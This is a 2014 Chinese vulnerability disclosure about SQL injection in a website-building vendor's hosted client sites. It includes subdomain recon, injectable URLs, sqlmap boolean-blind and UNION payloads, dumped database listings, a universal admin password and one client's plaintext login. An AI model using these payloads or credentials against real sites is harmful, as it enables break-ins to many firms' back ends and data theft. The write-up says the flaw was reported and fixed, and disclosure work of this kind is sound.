某建站厂商SQL注入影响数万企业

Feei <feei#feei.cn> 09/2014

0x01 信息收集

[+] Emails found:
------------------
david@***world.com
admin@***world.com
divid@***world.com

[+] Hosts found in search engines:
------------------------------------
122.227.***.250:server.***world.com
61.130.***.52:www.***world.com
114.80.***.133:testweb5.***world.com
61.130.***.53:wiki.make.***world.com
114.80.***.29:testweb7.***world.com
114.80.***.191:testweb6.***world.com
61.130.***.55:shop.testweb.***world.com
61.130.***.53:cn.***world.com
61.130.***.55:testweb.***world.com
60.191.***.236:admin.***world.com
61.130.***.54:make1.***world.com
61.130.***.53:make.***world.com
60.191.***.236:is-service.***world.com
61.130.***.53:service.***world.com
60.191.***.236:is-testweb7.***world.com
61.130.***.52:file.***world.com
60.191.***.236:hk.***world.com
60.191.***.236:253Dcn.***world.com

提取有用信息 testwebN.***world.com

于是查找注入点

0x02 漏洞证明

简单的找了下每个二级域下的SQL注入点:

testweb 61.130.97.55
http://testweb.***world.com/yining/admin/login.php

testweb2 61.130.97.52 主站
http://testweb2.***world.com/suotie/admin/login.php

testweb3 114.80.68.131
http://testweb3.***world.com/wangxiang/cn/products.php?tid=18&id=1

testweb4
testweb4.***world.com/lnr/cn/faqed.php?id=11&gid=1

...

http://testweb7.***world.com/dongfang/cn/products.php?act=list&id=7

通过注入点拿到数据库权限

Place: GET  
Parameter: TypeLevel  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=19&TypeLevel=1 AND 8971=8971&pid=19  
Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=19&TypeLevel=1 UNION ALL SELECT NULL,CONCAT(0x7170746271,0x4d597259547178556155,0x7171707a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&pid=19  

testweb数据库

web application technology: PHP 5.2.13, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[*] 'yining'@'localhost'
available databases [4]:
[*] information_schema
[*] maindb
[*] test
[*] ...

Database: maindb
[10 tables]
+---------------------------------------+
| t_admin |
| t_bak |
| t_dict |
| t_feedback |
| t_language |
| t_log |
| t_model |
| t_plugin |
| t_progress |
| t_timeline |
| ... |
+———————————————————+

testweb2maindb

Database: maindb 
[12 tables]
+------------+
| books |
| company |
| t_admin |
| t_bak |
| t_dict |
| t_feedback |
| t_language |
| t_log |
| t_model |
| t_plugin |
| t_progress |
| t_timeline |
| ... |
+——————+

testweb3maindb

Database: maindb
[6 tables]
+------------+
| books |
| company |
| t_admin |
| t_bak |
| t_dict |
| t_feedback |
| ... |
+------------+

通过分析得出以下结论:

0x03 漏洞影响

使用admin/ps99379937可以登陆所有后台,如下

上面截图是其中一个二级域名的管理后台,可以看到很多敏感信息 所有客户网站后台均可以登陆 从testweb的maindb.t_admin随便挑选一个用户

2644,102,宁波,朱宁斌,,lixiang,4,0,0,5000,李勇,100,lixiang,陈海啸,3lxanc85,,1,2,0,D0:D1:D2:D3:F0:F1:F2:F3:F4:F5:F6:F7:F8:F9:F10:E0:E1:E2:E3:E4:E5:E6:E7:E8:E9:E10:G0:G1:G2:G3:G4:G13:G5:G6:G7:G8:I0:I1:I2:I3:O1:O2,2009-04-30 16:24:58,http://china***.com,2010-02-12 00:00:00,100,宁波**信息工程有限公司,cn/index.php,2009-02-12 00:00:00,,宁波**信息工程有限公司

宁波信息工程有限公司(http://www.china.com/) 登陆地址:http://www.china.com/admin/ 帐号:lixiang 密码3lxanc

粗略测试了下,客户案例里面大部分都能登陆并获取到网站后台权限和数据库权限甚至源码。 点到为止,不继续挖了。

漏洞已报告给CNCERT/乌云/补天或厂商且已修复完成,感谢厂商的重视及现金奖励。

披露漏洞细节是安全行业通行做法,若对披露有异议请联系feei#feei.cn进行隐藏厂商处理。